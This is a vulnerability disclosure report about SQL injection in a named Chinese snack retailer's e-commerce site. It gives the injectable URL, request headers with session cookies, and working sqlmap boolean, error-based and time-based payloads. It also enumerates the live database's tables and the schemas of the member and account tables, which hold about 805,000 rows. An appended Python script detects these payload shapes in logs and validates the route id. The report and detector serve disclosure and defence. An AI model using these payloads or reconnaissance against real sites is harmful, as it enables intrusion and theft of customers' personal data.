2014-11-19: Details have been sent to the vendor and are awaiting the vendor's handling
2014-11-19: Vendor has confirmed; details are disclosed to the vendor only
2014-11-29: Details disclosed to core white hats and experts in the relevant field
2014-12-09: Details disclosed to regular white hats
2014-12-19: Details disclosed to intern white hats
2015-01-03: Details disclosed to the public

Laiyifen, a leading brand in China's snack-food chain retail industry, currently has nearly 2,400 stores across 9 provinces and municipalities including Shanghai, Jiangsu and Zhejiang, and serves nearly 60 million customer visits a year with quality food. Since its first store opened in 1999, Laiyifen has launched more than 700 food products across 9 major categories, including roasted seeds and nuts and meat products. Sales exceeded 3 billion yuan in 2013, with nearly 10,000 employees nationwide. "Three goods and one fairness" is Laiyifen's business philosophy: good quality, good taste, good service and fair prices.

Injection point (the asterisk marks the injected position):
GET /index.php/article-guanyuwomen-lists-1*.html HTTP/1.1
Referer: http://www.laiyifen.com:80/
Cookie: vary=d77f798a56ce90753573fc70c883ad591a94ee60638487365167a950e7783a9a; laiyifen_cookie=536871690.20480.0000; s=1e8737f4e245da0cab3df00d44c7437d; S[CART_COUNT]=0; S[CART_NUMBER]=0; S[CART_TOTAL_PRICE]=%EF%BF%A50.00; cart[go_back_link]=http%3A%2F%2Fwww.laiyifen.com%2F; ZDEDebuggerPresent=php,phtml,php3; MEMBER=-d41d8cd98f00b204e9800998ecf8427e-d41d8cd98f00b204e9800998ecf8427e-1415515310
Host: www.laiyifen.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
sqlmap identified the following injection points with a total of 235 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html
---
current user: '[email protected].%.%'
current database: 'laiyifendb'

available databases [3]:
[*] information_schema
[*] laiyifendb
[*] test

Database: laiyifendb
[176 tables]
+-----------------------------------------+
| app_default_info                        |
| awardlist                               |
| awardlist_copy                          |
| collect_shop                            |
| ds_0303_add                             |
| ds_0303_payment                         |
| ds_0303_ptype                           |
| ds_0303_rpcpoll                         |
| ds_ectools_analysis_logs                |
| ds_ectools_analysis_logs_2              |
| ds_guajian_1                            |
| luck_log                                |
| luck_log_mobile                         |
| member_lucknum                          |
| mobile_promotion_goods                  |
| moblie_luck_num                         |
| sdb_aftersales_return_product           |
| sdb_authenticator_clients               |
| sdb_authenticator_logs                  |
| sdb_authenticator_requestlist           |
| sdb_b2c_bcompany                        |
| sdb_b2c_brand                           |
| sdb_b2c_cart                            |
| sdb_b2c_cart_objects                    |
| sdb_b2c_comment_goods_point             |
| sdb_b2c_comment_goods_type              |
| sdb_b2c_counter                         |
| sdb_b2c_counter_attach                  |
| sdb_b2c_coupons                         |
| sdb_b2c_delivery                        |
| sdb_b2c_delivery_items                  |
| sdb_b2c_dly_h_area                      |
| sdb_b2c_dlycorp                         |
| sdb_b2c_dlytype                         |
| sdb_b2c_ecpool                          |
| sdb_b2c_ecpool_mobile                   |
| sdb_b2c_excard_rule                     |
| sdb_b2c_excard_used                     |
| sdb_b2c_fbtad                           |
| sdb_b2c_goods                           |
| sdb_b2c_goods_cat                       |
| sdb_b2c_goods_keywords                  |
| sdb_b2c_goods_lv_price                  |
| sdb_b2c_goods_promotion_ref             |
| sdb_b2c_goods_rate                      |
| sdb_b2c_goods_spec_index                |
| sdb_b2c_goods_type                      |
| sdb_b2c_goods_type_props                |
| sdb_b2c_goods_type_props_value          |
| sdb_b2c_goods_type_spec                 |
| sdb_b2c_goods_virtual_cat               |
| sdb_b2c_history_orders                  |
| sdb_b2c_history_products                |
| sdb_b2c_huodong_log                     |
| sdb_b2c_huodongda                       |
| sdb_b2c_jiang                           |
| sdb_b2c_jiang_huodong                   |
| sdb_b2c_jiang_log                       |
| sdb_b2c_jiang_members                   |
| sdb_b2c_lulu_card                       |
| sdb_b2c_member_addrs                    |
| sdb_b2c_member_advance                  |
| sdb_b2c_member_comments                 |
| sdb_b2c_member_coupon                   |
| sdb_b2c_member_goods                    |
| sdb_b2c_member_lv                       |
| sdb_b2c_member_msg                      |
| sdb_b2c_member_point                    |
| sdb_b2c_member_pwdlog                   |
| sdb_b2c_member_systmpl                  |
| sdb_b2c_members                         |
| sdb_b2c_meng_buy_1                      |
| sdb_b2c_meng_good_gift                  |
| sdb_b2c_meng_luck_reg                   |
| sdb_b2c_meng_send                       |
| sdb_b2c_order_coupon_user               |
| sdb_b2c_order_delivery                  |
| sdb_b2c_order_items                     |
| sdb_b2c_order_log                       |
| sdb_b2c_order_objects                   |
| sdb_b2c_order_pmt                       |
| sdb_b2c_orders                          |
| sdb_b2c_products                        |
| sdb_b2c_recharge_log                    |
| sdb_b2c_reship                          |
| sdb_b2c_reship_items                    |
| sdb_b2c_sales_baifendian                |
| sdb_b2c_sales_bangdingsp                |
| sdb_b2c_sales_freeShipping              |
| sdb_b2c_sales_rule_goods                |
| sdb_b2c_sales_rule_order                |
| sdb_b2c_sell_logs                       |
| sdb_b2c_shop                            |
| sdb_b2c_single                          |
| sdb_b2c_spec_values                     |
| sdb_b2c_specification                   |
| sdb_b2c_type_brand                      |
| sdb_b2copenapi_api_fail                 |
| sdb_b2copenapi_api_log                  |
| sdb_b2copenapi_api_log_copy             |
| sdb_b2copenapi_api_mobile_logs          |
| sdb_b2copenapi_request_shops            |
| sdb_base_app_content                    |
| sdb_base_apps                           |
| sdb_base_cache_expires                  |
| sdb_base_files                          |
| sdb_base_kvstore                        |
| sdb_base_network                        |
| sdb_base_queue                          |
| sdb_base_rpcnotify                      |
| sdb_base_rpcpoll                        |
| sdb_base_task                           |
| sdb_content_article_bodys               |
| sdb_content_article_indexs              |
| sdb_content_article_nodes               |
| sdb_couponlog_order_coupon_ref          |
| sdb_couponlog_order_coupon_user         |
| sdb_dbeav_meta_register                 |
| sdb_dbeav_meta_value_datetime           |
| sdb_dbeav_meta_value_decimal            |
| sdb_dbeav_meta_value_int                |
| sdb_dbeav_meta_value_longtext           |
| sdb_dbeav_meta_value_text               |
| sdb_dbeav_meta_value_varchar            |
| sdb_dbeav_recycle                       |
| sdb_desktop_filter                      |
| sdb_desktop_flow                        |
| sdb_desktop_hasrole                     |
| sdb_desktop_menus                       |
| sdb_desktop_recycle                     |
| sdb_desktop_role_flow                   |
| sdb_desktop_roles                       |
| sdb_desktop_tag                         |
| sdb_desktop_tag_rel                     |
| sdb_desktop_user_flow                   |
| sdb_desktop_users                       |
| sdb_ectools_analysis                    |
| sdb_ectools_analysis_logs               |
| sdb_ectools_currency                    |
| sdb_ectools_order_bills                 |
| sdb_ectools_payments                    |
| sdb_ectools_refunds                     |
| sdb_ectools_regions                     |
| sdb_gift_cat                            |
| sdb_gift_ref                            |
| sdb_giftpackage_giftpackage             |
| sdb_giftpackage_order_ref               |
| sdb_image_image                         |
| sdb_image_image_attach                  |
| sdb_operatorlogmanage_logs              |
| sdb_operatorlogmanage_register          |
| sdb_pam_account                         |
| sdb_pam_auth                            |
| sdb_pam_log                             |
| sdb_pointprofessional_member_point_task |
| sdb_recommended_goods                   |
| sdb_recommended_goods_period            |
| sdb_search_search                       |
| sdb_site_explorers                      |
| sdb_site_link                           |
| sdb_site_menus                          |
| sdb_site_modules                        |
| sdb_site_route_statics                  |
| sdb_site_seo                            |
| sdb_site_themes                         |
| sdb_site_themes_tmpl                    |
| sdb_site_widgets                        |
| sdb_site_widgets_instance               |
| sdb_site_widgets_proinstance            |
| sdb_timedbuy_objitems                   |
| shoplist                                |
| swjiang_contect                         |
| swjiang_contect_copy                    |
| tbasarea                                |
| tbaschildarea                           |
| tbasthirdarea                           |
+-----------------------------------------+

Database: laiyifendb
Table: sdb_pam_account
[9 columns]
+----------------+-----------------------+
| Column         | Type                  |
+----------------+-----------------------+
| account_id     | mediumint(8) unsigned |
| account_type   | varchar(30)           |
| createtime     | int(10) unsigned      |
| disabled       | enum('true','false')  |
| hmlogin        | enum('false','true')  |
| hmupdate       | enum('0','1')         |
| login_name     | varchar(100)          |
| login_password | varchar(32)           |
| openlogin      | varchar(60)           |
+----------------+-----------------------+

Database: laiyifendb
+-----------------+---------+
| Table           | Entries |
+-----------------+---------+
| sdb_pam_account | 805856  |
+-----------------+---------+

Database: laiyifendb
Table: sdb_b2c_members
[70 columns]
+----------------+-----------------------+
| Column         | Type                  |
+----------------+-----------------------+
| addon          | longtext              |
| addr           | varchar(255)          |
| advance        | decimal(20,3)         |
| advance_freeze | decimal(20,3)         |
| anyolife_uname | varchar(100)          |
| area           | varchar(255)          |
| b_day          | tinyint(3) unsigned   |
| b_month        | tinyint(3) unsigned   |
| b_year         | smallint(5) unsigned  |
| bind_time      | int(10) unsigned      |
| biz_money      | decimal(20,3)         |
| card_no        | varchar(20)           |
| card_type      | varchar(45)           |
| cert_no        | varchar(100)          |
| cert_type      | varchar(200)          |
| cur            | varchar(20)           |
| custom         | longtext              |
| disabled       | enum('true','false')  |
| education      | varchar(45)           |
| email          | varchar(200)          |
| end_date       | int(10) unsigned      |
| experience     | int(10)               |
| family_mem     | varchar(45)           |
| fav_tags       | longtext              |
| firstname      | varchar(50)           |
| foreign_id     | varchar(255)          |
| interest       | longtext              |
| is_card        | enum('0','1')         |
| is_upload      | enum('0','1')         |
| job            | varchar(200)          |
| lang           | varchar(20)           |
| last_loginip   | varchar(16)           |
| last_logintime | int(10) unsigned      |
| lastname       | varchar(50)           |
| login_count    | int(11)               |
| login_source   | varchar(45)           |
| member_id      | mediumint(8) unsigned |
| member_lv_id   | mediumint(8) unsigned |
| member_refer   | varchar(50)           |
| mobile         | varchar(30)           |
| month_income   | varchar(45)           |
| name           | varchar(50)           |
| nation         | varchar(45)           |
| order_num      | mediumint(8) unsigned |
| pay_time       | mediumint(8) unsigned |
| point          | int(10)               |
| point_freeze   | mediumint(8) unsigned |
| point_history  | mediumint(8) unsigned |
| refer_id       | varchar(50)           |
| refer_url      | varchar(200)          |
| reg_ip         | varchar(16)           |
| reg_source     | varchar(45)           |
| regtime        | int(10) unsigned      |
| remark         | text                  |
| remark_type    | varchar(2)            |
| score_rate     | decimal(5,3)          |
| sex            | enum('0','1','2')     |
| state          | tinyint(1)            |
| sum_pointtotal | decimal(20,3)         |
| tel            | varchar(30)           |
| unreadmsg      | smallint(5) unsigned  |
| use_total      | decimal(20,3)         |
| vipapply_no    | varchar(45)           |
| vipapply_time  | int(10) unsigned      |
| vipcard_no     | varchar(45)           |
| vipcard_pwd    | varchar(45)           |
| vipinfo_no     | varchar(20)           |
| vocation       | varchar(50)           |
| wedlock        | enum('0','1')         |
| zip            | varchar(20)           |
+----------------+-----------------------+

Database: laiyifendb
+-----------------+---------+
| Table           | Entries |
+-----------------+---------+
| sdb_b2c_members | 805876  |
+-----------------+---------+
I won't dump the actual data.
Strengthen parameter filtering.
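As an added defender-side example (not code from this report, and not part of the laiyifen.com site, which runs PHP), the script below does two things the report's findings and its fix advice point at: it enforces a strict allow-list parse of the numeric list id in the vulnerable route, so anything other than a bare integer is rejected before it can reach a query, and it scans web access logs for the three payload families sqlmap reported (tautology comparisons, the FLOOR(RAND(0)*2) error trick against INFORMATION_SCHEMA, and SLEEP()/BENCHMARK() delays). The combined-log-format lines, timestamps and RFC 5737 client addresses are constructed for this example; only the payload shapes are taken from the sqlmap output above.

```python
"""Spot sqlmap-style SQL injection probes in access logs and enforce a strict
route-parameter check. Added example; log lines below are constructed."""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Combined log format request line (assumed log layout).
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>.+?) HTTP/\d\.\d" (?P<status>\d{3})'
)

# One signature per injection family sqlmap labelled in the report.
SIGNATURES = {
    # "AND 3372=3372": a comparison whose two sides are the same number
    "boolean-based blind": re.compile(r'\bAND\s+(\d+)\s*=\s*\1\b', re.I),
    # duplicate-key error trick, typically aimed at INFORMATION_SCHEMA
    "error-based": re.compile(
        r'FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)|INFORMATION_SCHEMA', re.I),
    # delay functions used for time-based inference
    "time-based blind": re.compile(r'\b(?:SLEEP|BENCHMARK)\s*\(', re.I),
}

# The vulnerable route carries a numeric list id; the allow-list is "digits only".
ROUTE_RE = re.compile(r'^/index\.php/article-[a-z0-9]+-lists-(\d+)\.html$')


def classify_request(path: str) -> List[str]:
    """Return the injection families whose signature appears in the decoded path."""
    decoded = unquote(path)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))


def parse_list_id(path: str) -> Optional[int]:
    """Strict parse of the list id; None means the request must be rejected."""
    m = ROUTE_RE.fullmatch(unquote(path))
    return int(m.group(1)) if m else None


def scan_log(text: str) -> List[Dict]:
    """Return one record per log line that carries an injection signature."""
    hits = []
    for n, raw in enumerate(text.strip().splitlines(), 1):
        m = LOG_RE.match(raw)
        if not m:
            continue  # malformed line; a real pipeline would count these
        families = classify_request(m["path"])
        if families:
            hits.append({"line": n, "client": m["client"],
                         "path": unquote(m["path"]), "families": families})
    return hits


# Constructed sample log: a benign request, the three probe shapes, another benign one.
SAMPLE_LOG = r'''
203.0.113.10 - - [19/Nov/2014:10:00:01 +0800] "GET /index.php/article-guanyuwomen-lists-1.html HTTP/1.1" 200 5120
203.0.113.10 - - [19/Nov/2014:10:00:02 +0800] "GET /index.php/article-guanyuwomen-lists-1%22%20AND%203372=3372%20AND%20%22GBOg%22=%22GBOg.html HTTP/1.1" 200 5120
203.0.113.10 - - [19/Nov/2014:10:00:03 +0800] "GET /index.php/article-guanyuwomen-lists-1%22%20AND%20(SELECT%209648%20FROM(SELECT%20COUNT(*),CONCAT(0x3a7374703a,(SELECT%20(CASE%20WHEN%20(9648=9648)%20THEN%201%20ELSE%200%20END)),0x3a656f733a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20%22RgGC%22=%22RgGC.html HTTP/1.1" 500 812
203.0.113.10 - - [19/Nov/2014:10:00:09 +0800] "GET /index.php/article-guanyuwomen-lists-1%22%20AND%20SLEEP(5)%20AND%20%22iUWY%22=%22iUWY.html HTTP/1.1" 200 5120
198.51.100.7 - - [19/Nov/2014:10:00:10 +0800] "GET /index.php/article-guanyuwomen-lists-12.html HTTP/1.1" 200 4870
'''

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['client']} -> {', '.join(hit['families'])}")
    for p in ("/index.php/article-guanyuwomen-lists-1.html",
              "/index.php/article-guanyuwomen-lists-1%22%20AND%203372=3372%20AND%20%22GBOg%22=%22GBOg.html"):
        print(p[:60], "->", parse_list_id(p))
```

The route check is the actual fix: validating that the id is a bare integer (or binding it as a parameter in a prepared statement) removes the injection regardless of what the signatures catch. The log scan is the detection side, and it decodes the path before matching so URL-encoded quotes and spaces do not hide a probe; the signatures are deliberately narrow to the shapes seen here, so treat a hit as a trigger for review rather than a complete SQL injection detector.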
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2014-11-19 17:20
Many thanks to WooYun and pandada for the support, many thanks!
None.